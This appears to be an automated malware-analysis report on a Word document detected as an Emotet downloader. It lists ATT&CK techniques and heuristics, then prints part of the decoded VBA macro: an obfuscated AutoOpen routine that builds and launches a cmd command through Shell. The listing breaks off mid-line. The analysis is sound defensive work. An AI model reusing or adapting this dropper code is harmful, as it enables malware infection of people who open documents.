Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6883990-0. It contains a VBA macro with an AutoOpen function, a common technique for Emotet. The macro appears to be obfuscated but is designed to download and execute a second-stage payload, consistent with Emotet's behavior.
Heuristics (5)

- ClamAV: Doc.Downloader.Emotet-6883990-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6883990-0
- VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]: Document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16974 bytes |

SHA-256 of macros.bas: eea77221fe52667d3d546690e8c044ac468bc9d5a5149a58374e975fd0495f8d
Preview script: first 1,000 lines of the extracted script (shown exactly as carved; the listing is cut off by the report)

```vba
Attribute VB_Name = "zmNAGjhfui"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const TARUSGZON = 0
Dim GqJzv(4)
GqJzv(0) = Right(tIANTYd, 271) + Left(iMCJl, 246) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135)
GqJzv(1) = Left(iMCJl, 246) + Mid(fmwSuvRQ, 102, 719)
GqJzv(2) = MidB(shwKz, 567, 135) + Right(tIANTYd, 271) + Right(tIANTYd, 271) + Mid(fmwSuvRQ, 102, 719)
GqJzv(3) = MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135) + Right(tIANTYd, 271)
Dim JjORK(3)
JjORK(0) = MidB(shwKz, 567, 135) + Right(tIANTYd, 271) + Mid(fmwSuvRQ, 102, 719) + Mid(fmwSuvRQ, 102, 719)
JjORK(1) = Mid(fmwSuvRQ, 102, 719) + Mid(fmwSuvRQ, 102, 719)
JjORK(2) = Left(iMCJl, 246) + Right(tIANTYd, 271) + Left(iMCJl, 246) + Left(iMCJl, 246)
Dim DLmSC(5)
DLmSC(0) = Right(tIANTYd, 271) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719)
DLmSC(1) = Left(iMCJl, 246) + MidB(shwKz, 567, 135)
DLmSC(2) = MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135) + MidB(shwKz, 567, 135)
DLmSC(3) = MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719)
DLmSC(4) = Mid(fmwSuvRQ, 102, 719) + Left(iMCJl, 246)
Dim ZBTniI(3)
ZBTniI(0) = Right(tIANTYd, 271) + Right(tIANTYd, 271)
ZBTniI(1) = Right(tIANTYd, 271) + Left(iMCJl, 246)
ZBTniI(2) = MidB(shwKz, 567, 135) + MidB(shwKz, 567, 135) + MidB(shwKz, 567, 135) + Right(tIANTYd, 271)
Dim diRSNU(4)
diRSNU(0) = Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135)
diRSNU(1) = MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719) + Right(tIANTYd, 271) + Mid(fmwSuvRQ, 102, 719)
diRSNU(2) = Mid(fmwSuvRQ, 102, 719) + Left(iMCJl, 246)
diRSNU(3) = MidB(shwKz, 567, 135) + MidB(shwKz, 567, 135) + MidB(shwKz, 567, 135) + MidB(shwKz, 567, 135)
Dim aYnED(3)
aYnED(0) = Left(iMCJl, 246) + Left(iMCJl, 246)
aYnED(1) = Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135)
aYnED(2) = Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135) + Right(tIANTYd, 271) + Left(iMCJl, 246)
Shell@ bNFBcvwNl + ztwBlGQZG + RMEdLzdHAjK + WozXTGoIhsUmuE, TARUSGZON
Dim cajMc(4)
cajMc(0) = Left(iMCJl, 246) + MidB(shwKz, 567, 135)
cajMc(1) = Mid(fmwSuvRQ, 102, 719) + Mid(fmwSuvRQ, 102, 719)
cajMc(2) = MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719)
cajMc(3) = Left(iMCJl, 246) + Left(iMCJl, 246)
Dim FLDhf(3)
FLDhf(0) = MidB(shwKz, 567, 135) + Left(iMCJl, 246)
FLDhf(1) = Right(tIANTYd, 271) + Right(tIANTYd, 271)
FLDhf(2) = Left(iMCJl, 246) + Left(iMCJl, 246)
Dim CIrdqW(2)
CIrdqW(0) = Mid(fmwSuvRQ, 102, 719) + Right(tIANTYd, 271)
CIrdqW(1) = MidB(shwKz, 567, 135) + Right(tIANTYd, 271) + MidB(shwKz, 567, 135) + Right(tIANTYd, 271)
End Sub
Attribute VB_Name = "BajUjTkqQvqWw"
Function bNFBcvwNl()
Dim MnAhk(4)
MnAhk(0) = Mid(fmwSuvRQ, 102, 719) + Left(iMCJl, 246)
MnAhk(1) = Mid(fmwSuvRQ, 102, 719) + Left(iMCJl, 246) + MidB(shwKz, 567, 135) + MidB(shwKz, 567, 135)
MnAhk(2) = Mid(fmwSuvRQ, 102, 719) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135) + Right(tIANTYd, 271)
MnAhk(3) = MidB(shwKz, 567, 135) + Left(iMCJl, 246)
kztBTXfwZU = CStr(Chr(CleanString(7 + 6 + 4 + 0 + 82))) + "md /V" + "/" + CStr(Chr(CleanString(5 + 4 + 2 + 0 + 56))) + CStr(Chr(CleanString(2 + 2 + 1 + 0 + 29))) + "^se^t ^7" + CStr(Chr(CleanString(5 + 4 + 2 + 0 + 56))) + "=^ ^ " + " ^ " + "^" + " ^ " + "^ ^ ^ ^ " + "^ }}{h" + CStr(Chr(CleanString(7 + 6 + 4 + 0 + 82))) + "t^" + "a" + CStr(Chr(CleanString(7 + 6 + 4 + 0 + 82))) + "^}^;" + "^k^a" + "^er^b^"
Dim aswvw(4)
aswvw(0) = Left(iMCJl, 246) + Right(tIANTYd, 271)
aswvw(1) = Right(tIANTYd, 271) + Right(tIANTYd, 271) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135)
aswvw(2) = Left(iMCJl, 246) + Left(iMCJl, 246) + Right(tIANTYd, 271) + Left(iMCJl, 246)
aswvw(3) = MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719) + Left(iM
```

... (truncated)